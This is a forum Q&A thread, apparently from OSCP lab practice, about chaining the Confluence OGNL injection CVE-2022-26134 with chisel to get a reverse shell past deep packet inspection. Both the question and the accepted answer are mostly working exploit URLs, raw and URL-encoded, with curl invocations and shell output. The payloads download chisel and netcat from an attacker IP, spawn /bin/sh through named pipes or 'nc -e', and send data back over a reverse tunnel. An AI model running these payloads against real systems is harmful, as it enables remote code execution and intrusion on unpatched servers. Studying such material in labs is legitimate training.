1

My lab has these restrictions:

1. Inbound and Outbound HTTP connections are allowed from CONFLUENCE01.
2. For Non-HTTP connections, only inbound TCP is allowed at port 8090 of CONFLUENCE01.
3. CONFLUENCE01 cannot open new WAN ports.

Hence, I tried to exploit named pipes to start a reverse shell on CONFLUENCE01 using chisel:

cve-2022-26134_chisel_reverse_payload.txt

http://192.168.226.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','rm -f /tmp/in /tmp/out; mkfifo /tmp/in /tmp/out; /bin/sh -i < /tmp/in > /tmp/out 2>&1 & /tmp/chisel client 192.168.45.249:8090 R:4444:192.168.45.249:9999 > /tmp/in; curl --data @/tmp/out http://192.168.45.249:9999').start()")}/

┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ cat cve-2022-26134_chisel_reverse_payload.txt | python3 urlencode_special.py
http://192.168.226.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27rm%20-f%20/tmp/in%20/tmp/out%3B%20mkfifo%20/tmp/in%20/tmp/out%3B%20/bin/sh%20-i%20%3C%20/tmp/in%20%3E%20/tmp/out%202%3E%261%20%26%20/tmp/chisel%20client%20192.168.45.249:8090%20R:4444:192.168.45.249:9999%20%3E%20/tmp/in%3B%20curl%20--data%20%40/tmp/out%20http://192.168.45.249:9999%27%29.start%28%29%22%29%7D/
                                                                                           
┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ curl http://192.168.226.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27rm%20-f%20/tmp/in%20/tmp/out%3B%20mkfifo%20/tmp/in%20/tmp/out%3B%20/bin/sh%20-i%20%3C%20/tmp/in%20%3E%20/tmp/out%202%3E%261%20%26%20/tmp/chisel%20client%20192.168.45.249:8090%20R:4444:192.168.45.249:9999%20%3E%20/tmp/in%3B%20curl%20--data%20%40/tmp/out%20http://192.168.45.249:9999%27%29.start%28%29%22%29%7D/

However, instead of getting a reverse shell, I simply get an echo of the commands I run:

┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ nc -nvv 127.0.0.1 4444
(UNKNOWN) [127.0.0.1] 4444 (?) open
whoami
fuck
whoami

┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ nc -nvlp 9999
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.226.63] 43162
whoami
fuck
whoami

Why aren't commands I send from nc -nvv 127.0.0.1 4444 being executed and returned by /bin/sh -i of CONFLUENCE01? Am I using incorrect syntax or is this logically impossible? My ultimate goal is to wrap a normally TCP reverse shell into a fully HTTP reverse shell using Chisel.

Improve this question
4
  • 1
    "Try harder"? Walk us thru the networking you are expecting to happen. Commented Apr 5 at 12:45
  • We need more information. From where to where do you want to connect thru what? Commented Apr 5 at 12:58
  • 1
    The way you are using chisel makes no sense to me. Chisel creates listening sockets on the client or the server (if you use R:) and will forward the connection and data through HTTP to the other peer (to the server if no R, to the client otherwise). You don't need to use pipes or curl. It's like an SSH tunnel, but through HTTP. So make bash use a TCP socket for IO (i.e. /dev/tcp/127.0.0.1/XXXX) then run chisel to forward that connection to the remote host where the chisel server is running. At the point use nc to connect to the local (from the server pov) socket. Commented Apr 5 at 13:30
  • Hey, y'all! Thank you for your support. So basically, we normally use chisel as a tunnel so that it can pivot through whatever machine we have RCE on. However, in a situation where DPI blocks non-http connections and only allows one inbound TCP port on that machine, we need a way to tunnel a reverse shell through the machine itself. Commented Apr 7 at 4:01

1 Answer 1

Reset to default
1

TL DR:

cve-2022-26134-download.txt

http://192.168.120.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','wget 192.168.45.183/chisel -O /tmp/chisel && chmod +x /tmp/chisel && wget 192.168.45.183/nc.traditional -O /tmp/nc && chmod +x /tmp/nc').start()")}/

cve-2022-26134-confluence.txt

http://192.168.120.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','(/tmp/nc -nvlp 9999 -s 127.0.0.1 -e /bin/sh &) && /tmp/chisel client -v 192.168.45.183:8090 R:7777:127.0.0.1:9999').start()")}/

──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ cat cve-2022-26134-download.txt | python3 urlencode_special.py      
http://192.168.120.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.45.183/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%20%26%26%20wget%20192.168.45.183/nc.traditional%20-O%20/tmp/nc%20%26%26%20chmod%20%2Bx%20/tmp/nc%27%29.start%28%29%22%29%7D/
                                                                                    
┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ curl http://192.168.120.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.45.183/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%20%26%26%20wget%20192.168.45.183/nc.traditional%20-O%20/tmp/nc%20%26%26%20chmod%20%2Bx%20/tmp/nc%27%29.start%28%29%22%29%7D/
                                                                                    
┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ cat cve-2022-26134-confluence.txt | python3 urlencode_special.py
http://192.168.120.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27%28/tmp/nc%20-nvlp%209999%20-s%20127.0.0.1%20-e%20/bin/sh%20%26%29%20%26%26%20/tmp/chisel%20client%20-v%20192.168.45.183:8090%20R:7777:127.0.0.1:9999%27%29.start%28%29%22%29%7D/
                                                                                    
┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ curl http://192.168.120.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27%28/tmp/nc%20-nvlp%209999%20-s%20127.0.0.1%20-e%20/bin/sh%20%26%29%20%26%26%20/tmp/chisel%20client%20-v%20192.168.45.183:8090%20R:7777:127.0.0.1:9999%27%29.start%28%29%22%29%7D/                                 
                                                                                    
┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ nc -nvv 127.0.0.1 7777
(UNKNOWN) [127.0.0.1] 7777 (?) open
whoami
confluence

Full Insight: https://medium.com/@wonjae_82162/how-i-bypassed-dpi-chained-cve-2022-26134-to-a-bidirectional-reverse-shell-via-chisel-and-724470b949f9

Improve this answer
2
  • Your answer could be improved with additional supporting information. Please edit to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers in the help center. Commented Apr 7 at 9:12
  • Hey bot, read my Medium article before you say anything Commented Apr 8 at 2:31

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.